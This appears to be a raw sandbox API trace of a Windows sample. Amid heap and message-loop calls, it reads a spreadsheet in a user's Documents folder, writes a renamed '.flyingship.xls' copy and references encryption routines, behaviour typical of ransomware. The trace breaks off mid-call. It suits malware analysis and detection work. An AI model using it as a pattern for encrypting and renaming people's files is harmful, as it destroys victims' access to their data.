1 [0176.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.491] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.491] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0176.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.491] CryptDestroyHash (hHash=0x90af58) returned 1 [0176.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.491] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pwvig6n-.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0176.493] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.493] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0176.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0176.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0176.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.493] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0176.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0176.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0176.494] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0176.494] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0176.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0176.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0176.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0176.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0176.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0176.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0176.495] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0176.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0176.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0176.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.496] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.flyingship.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pwvig6n-.flyingship.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0176.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0176.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.497] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0176.497] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0176.497] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0176.497] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0176.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0176.498] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0176.498] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0176.502] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x4fb7, lpOverlapped=0x0) returned 1 [0176.502] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0176.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0176.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14fb7) returned 0xbea018 [0176.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0176.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0176.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14fb7) returned 0xa5f008 [0176.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0176.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.506] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0176.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14fb7) returned 0xbea018 [0176.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0176.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0176.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.507] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0176.507] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0176.507] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0176.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0176.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14fb7) returned 0xbea018 [0176.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0176.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0176.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0176.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0176.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0176.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14fb7) returned 0xa73fc8 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0176.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0176.509] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0176.510] HeapFree (in: 